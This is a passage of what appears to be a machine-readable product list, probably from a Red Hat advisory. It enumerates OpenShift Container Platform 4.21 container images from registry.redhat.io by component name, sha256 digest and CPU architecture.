"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:caf64d624cc8e698f0d6cbd583ea3d43b64e46da125b6608dfe4072915d68f43_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:229041be25597926b6cba147a685e9025f1fd38aaccd3ada69f6f08a36a1c3d5_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:41cfbaf6fa7e1c4e9d9ab2bbfaed39024c445e6d9437745ee69ff6b9f1ea73b0_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:73502251685a4ceb38593092b7b9678630d7266496bf860ec2abe6bb77afcea0_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:fc6d0b64e7e5ccfdec2fa08bab5b2a0d598d2afe6272b593656d8b3c7d9aa725_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-agent-installer-ui-rhel9@sha256:9490248af37278e0b107eef719bea4e4b14e2840f42d5d31c0a546efb9a16ab8_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:2e1a0d68274399049a694f58a73c92fcba077c59f50c20da896451b7724f1ebf_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:49dbeb17cd5787537cb5e30dd5d2c7adcf720346613c28004d292a5a554a4fa7_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:524c4410d51b126c6097fae3b2ad88ec67900e7b786a9131b7a8e96a194e4847_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:f5cdce5e8eee1b014ff8a0a12181a3d05d5dbb747e8e4114c18d7c891e97a477_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:7662f86e2f8f23582ae548c70dad5458e37256f9c4cdc401be880e319ef591c2_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:cb234cf1c44de4b0b0713b2792e06e115830b115d540b494baccad28139b4fd2_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:7f0514302066e0f199e33be56fe074f7666e223169df5f71b06e06779bdb6e8b_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:df3552170db05d67f4e75e756495f62164a28bd7468f4093e43f3a7c13bf7682_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:9c8cebfcb7f84844bb476441b61c60a3c88fc562406c84689958b517282966d3_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:c7609e999d1c88e83dd99682b5756386c274d506704340d78be73efe9e6f35b1_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:07c82fce5e470c7ee9c3c1fdc6c953c962ed119411c88bf5fd4f0a08e3a0b9b7_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:83a7a3bb3080d3386eb7fa7debe976a551c272a1d70f31d7cc05a437f175f0c2_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:aa7cbd8edc2a40bf3b8572f48f1174b46134ecd22c1a961984c7989398a5a0ab_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:e9c7cedabf9b749ae2faf9427a229757c3c1c5871054667444168030eab28aab_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:f3470dd96c2c29ceef92ea0ab5adfcecead95eba0f1caa1fad96f3fdf50f57c6_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:f96eef8cedb41be61dcaf4850e5550582f0d84a306775dfc0c7f9958f18ba7ff_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:5d09872519b5a3247dd7a3d5bd250485dcd750307c3853e2cdf43519889178ff_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:63523bed0624b4db33be2b7a5e8dd3c5b532c70a3ad3083504aebc29e85d3a29_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:20a2d23d2de3e31036ca89f2d629b6d06df5504b8f46c88a6cb5e081aa6afdc8_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:c47e8b82686adae62dd7c66b82309407d82166f510384a404343e515b829001d_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:cb2a3088916b8d8f9489260792f677a59864ab01e9c62361198549b1f822a80b_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:f18c64ad1dd81b9ae774488b6994b6d17f6aeb968e644652150ea08b3f6b4dbb_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:a0f3e8ad332f4e63e1aa2742eef069487fd49f4c335269da7b619f7630907a45_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:d2dfd7ae650a6eaced303a1119f94cc1a7097d7609e2a80d84aef5e6380d902e_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:2d622f4dbba3bd91a020a734dc0d8c632e58d56373cae44c4af79cbc81a37cd4_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:8a69bf9f6b9f8e3dc685d704d31b4a4eded70bdf33ed57dfa8768c016faae46a_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:9d0697a33547102399cbeb0a60f9ebfb2a2eb4d3c0e15efba177a96dd27e60f8_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:c87863f0cd97c592cc54c1fc2ab9fbe1468d6302763eaa7a6530af059382d797_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:2a8fa4bac908dd97a3be2e302eb6ac1431dc3537beed23caf257d2c3f47bbc74_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:98994385568f84af533c448d17ae372eac4a26eda4a6b62277253155e20bae54_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:0b92ec408159a4f0e5308cf58ad89cc4ca40880ce097e0807a19c12f235ca5fc_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:291f1185778ccc92e28d235ab30ddb1f85fb94199d3889dcf600f35e60093d4c_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:7a6604dbc334622a976776e7725e4eba7ba4e8872a87f49bbb1c6f334b2f6c95_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:b2b43c379dcfac66d038927315c419c7d512ce1dd29b34c7dc74a00f7b63a0d1_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:5628a2419c5721f274edcfe794c881d1fb2af158788c45fbcb7a33f6db9948d4_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:56b71e09ae6780121a1c0a52867782196cd43c3e716093fca3ceb3fde5b66d1f_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:5c1172fb42f1b34b67f5e2044bb190849bacaf5eebabdafdc82d0a7f1c1a7d84_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:d617cb1a419f9d43b5bfff5bfdc670a9c8d0462b47c474d4d1ccea726c108101_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:03f260cff8faf00b22557be8d6be6f81489e9265b339c3a3053bfe5b1de020e7_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:5cc05e80c48b83737bcd3f4622e0eedaed7baf06024c23753ca77ffc11b9b306_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:9df1f434a7eae17b9e335feb35d3cad8d15887bc55d2f20c8720ac17633e88f5_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:e3d92a87de3c10beda3aba219657f079cafcd03c6ee0b87bd0826d3f51e85997_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:20f0c4f5e4678aac81a44e5f164627b29bbebfc3e17b5010ea7104309a234476_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:2125f95e12d8c30d743da09f3f8451e70a7b0cd8299b173f748a4affd1aab940_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:42c14c3b43aa86ab4a94d86b737ce7eea32703c70db0a5f0e9ac13f9a8f385cf_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:fe5f92c1647f1b8a6d7c25f4b11bbf310b7f9c2003d9fd8d9659108114330054_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:24b98a6e4bc5f0edd37fcb1a0aefa809cc95d50a22da8059c3a8a6811d1596ad_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:27d6d5aea37e0e535d3db14419f53b898251476c64e9f41f00d2afc308d22293_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:4d0e4a3e50a3bac437c4960c0a079d2148fb8dab6655a761b1d10a1c653633b1_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:6c4e49d812a40fa01b187bce2d2f6060df10a06ddb248469465c53c6e8c01415_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:2bcdce58a9dec8306ea7ec58ed588c6def1d0e2891d06b91661cb04a1411242f_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:493c047ca44c43a15896612c8df60ed0e65017435c57e5cad41a9ee23b275e71_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:6427135ca011b5cc6539000ab9d3bd9e2d68c7703d1e50423d01a88d8ed90fc6_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:b33e8c16ab733fb79f0f690e0288f40e9bf8e03a7477b35120dcd29475fb9310_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:53e8fcbba44d9c73eb93da4c101562634f44646eafb544d4c711431b409ff825_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:73223d1dcb0b0d07decc32ba99eb6875597c1fac474c6c9368f75ef12e342e4d_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:809e1636777dcaaa79d79c5edb76ff243ca743fa119a4988b3ac8b9222d3ba3f_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:981dfbf55ceaaaca41ec375ff1a95db0409f443ed70dc84859545af82668280c_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:197df56874e5b85f148dec36d644749d5e1c39e262737beab0fa2f866749876f_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:9705094f22d110094312ff158c6fe6576de45d5119f3f236608831fb286e953b_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:b710c08d2b2cee582d55d2bb5829b0d35375e04c88a1d2e9b7cef725212d0cba_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:d0c4572792d7337fe9ce11cdd9000ebc8d86b345bc7e8dcb6b2718ad3439c6fe_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:1746abd22482e0307a612a4832326e681ecb67358723df137b076bf13dbe638d_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:8fecae242c9d6ef4ea859bbb68219912ce75735c53b350ddca2ef230c1dc17af_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:da2bd0d6afdcf81c37f95aba0ea52d4ee063710a49bf399938ba8dca10f079ef_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:edbe1d6b65c67df5cc6822fc0138938ca4266c792d8dedd8121dc88648d72a16_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:3f4231f318f661de982c522ecc26a6e35a1728e12b68d84ae32641fb41ac0ce0_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:6a19d1ab1ae1c3a8cd270e3b90ba8631d8342688f9111e7eb05d6d5e7b9c7e0e_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:97c43c0d0949b12333e19892c20232f1db9e9a4400022b13ce628e20398b1b83_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:eaac0e5ca6347913022442f309e559ad953f5f92ba6c6ebd545e276b229d75fb_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:217f0c7a5cae2b5d399977054083acbe87ad4005f7471eb76d6290cd1ec98217_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:92f8b02f0ea036b3630d44820aefc84c9853f218fc679b9750c088cc4f07c1af_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:a7515b3ad53a0ac77da9d16a60b50e43385784930e96d5545094c7019607f95f_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:c19b3af8649a3add22233266845553734d949453ad4095426e79ab373528bdd1_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:1432f3b24284b174dd6c69fc6170eb2952ddd29d8eeb976911c5f0ddb3e2e21b_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:15dfa677bfa8066eaf05de566e02ed341900558be9d384b9face40216889730e_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:1ca76b4d5aa455cef111e3ea31cc16eafe26a6c3ed6a9f4111e66e2088a5b3de_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:c6ac4b0406087730cb3689049a5322f057cb7f6e2caf6f39dee68baa115cc85b_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:148d7bf1e8d2f5a7b853e257ed30aec67b9d684316756b8593d1f31a2ab0d593_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:47a0e0bcec249f6ed2003797f66ce095128fb8115326a7d0ef41d528e2445213_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:66b6fd4e62537ca3252f72fad3807c10bb3d32dcc535e84f7c80d7cca1f12cf3_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:9463ca409614b7d8fe425b0792a1faa34cf43d3397dbf00ddf05b13997cd8ba6_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:16d3fcd0bbbd77893146ff2ff66f2b56ef1e23f0a478e506e52b8c3481f45c4b_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:70ece97f4bde794353c6e71255874b17d3af77b1a4d2283460b7188a495c782c_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:959c043c98f9c69d091fa1ff171360b2cf40e829becdc967f5b314e66ccf9fde_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:d4b99966cb1cdf067d73eab6074f42203f65c0a10c78ef3b16f7deae78e21b94_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9cb8a702b78977cc3a6e5418210d15a0d431fa56c217cfd8b5f69653d6acb89d_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:a5f93ba58c76c1d26d44bbe14a70d4cfb07e7edd9401bee47da3ce2abc435bc1_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:ba11e45b58a6c4940f40f11c0d47129571103de5883d4ccf22b6ba5b9ccdb9b4_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:fc95a3a095e63ec33e95a638dae9f529583c054cbdc3dacf1b90d1e10f35bea3_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:299f374419ceec56c49dc130fc4052bb7140be28f23b6f5b414607bc8ad4a805_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:414f0b86c4940ad7a5ca443bf04ff8293f93804d8b69688382e177afa1459394_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:b96362fcb7b09af38eed2bd77d8720fe128a4c677d3a5d46dbe3b09412fd1fd5_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:e207c502258c60ca9fbe42ecaf9ab005dd7ba3d9b76566b6a92756fc73b6968e_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:1a22a625e67c26e4db67b97a3e08fe63a1ed931e419b732fb186567ab5c2edd7_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:42396c0e20ce9c8afbfb8c87b80e1b48b0695118a583b1e107f07bae9ead7614_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:46afc0e9d2c34fbcb000ed2ac59c393aa4160944bf083b4b4ef7f09a73c77023_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:903ed233bcf6493cca231fe024bda6085f9dda1052783e5f8daa8d5c35b6652f_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:b3747aca163af2713256a975222f6dac10692a5b99ef948bb8e4471532e4e484_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:cb27bf3938c353f8ed8138c5c650be7e72ee2e9d6b14e998eaa2e39db18fe3ed_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:fef2fda5b7fde7cae7b32d63507fe61ffcc74632e7c5170146f9afa5d827a359_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:ff132632ffb2f87746e79787cac21fba12a9862a707885dbe9ccf95f2b388941_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:15399cbb6b6adc9ec25f1174ad8e04f5c5f5bf0b02d4ee7023b4f38e810aca03_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:51b7944a69371c67883a6decf075013feb4cea80258fc0927176fa824c98cf2f_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:b24d5a179400093a2a61b87f3c0dbd8d1f1f91e8fcb288e18f87ef5fe8bd6a4c_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:e8aa91667479746a74f25506fcdaa4b639b947d73a77af49f2b945f93e2fdb46_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:1782aa4b09b78512885d81c529588737d738cf29def3ff2542e74fd02d256cf2_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:66e02bf9c48cac8edb441d20fc8bcf3f57af58d13b9bc65e7337592e466592c3_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:c9f28ea22ec8ebfecd5af2d0369ed023b6f9d4e3413e3ad6048aeebb124ede5f_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:ccd9f2be0df364b640b1e2b8b470bb9a536222383734258e4917bcc0adddec38_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:03747941ed41fbe46a4eea27ccedfde73d5cb56d7da3e6bd58c0591800014e3c_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:725ba6da6b823755b419f3fa21abd83b3b8bfbda87a0ebe95cd1154afdd5edca_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:b6d1aa1c4d291f0e581185ac425a900961f2a01b73481f004607e0918af0aaad_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:bfc8fbbd5e342e4e801d576913b0a6a9c41150c0a091eb43d0886a18f3a22f17_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:63f0b1ba5c3947e640911e31b9032bce1b7e3cffd16574158a67a9d8bfbb52d1_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:9a0291c1d482cc75b5da3b61ea6cb240bae63c7f7bae7ca5d6ef9cdd30233432_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:d8fcb99e70b38b22fe131df90326e000e0cda91f206468ad06d4e8ebecc323a0_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:e44e5b2f803f9c0e0003b5832fbb90a80c9e35a36ff524cfbe04b00d18dd9aad_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:0628f21ae749dad21df82d4375448da03b3556d8cfa3411a91d7693ee050635f_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:33b125caf8101d10e87c75d960666659dc64ecb8c9cc15c39049f82b174a2b03_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:3be19f58c31be0655db45e701bd9852a07ae1fda287301fa8218f2ef56c2ee55_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:99153879eb97320f2d86b6af296540250f7e234f847a01bc3d0ab50e509918a9_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:0e4945c40c683253f210a354ab1b52cfaae5fb3c844b47f391c1cdaa9fe170a0_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:16ebabf0329c1fa4104b3f3d244c3b3e54ff6b7f747b092b66e3ef2b4d79216f_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:200cc383245287f696fd5c0c6bf63b2bfb96c4e27e8fa46f7938b49af2e40f94_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:5cf69f239d585f936caca1ea97ec5870e6fdfcfee2fdf83984d40e371fa31180_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:31946984af1316d14937792eb39335d8effa5774fc5c28200d770d48117ce492_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:b39be2a08e43aef9897cc7a3d411d9ad6b8037cfed852e916e57d0346ac7e675_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:c82aa35aff9a2feda3598f7a1d84a7b7b78736af05dbeccdac3a5d2600d6cbb5_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:fda1392b4de1ec066e6e816968c6a5af8fe4f33a9dd81216dcac8f34c5824010_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:2a75be0f5104de3c9b587e92dd8e266d7d54c278b8c15321b377ca6ad7636cf0_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:33929a52af39ae582e1c19c4b3598b0b1d83669aed27faa42fdad73798d7b4bc_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:70f1339b43a7a2ffa55e8128782dbf02308e74e7f3b71e93e498a8fc841bae68_s390x",
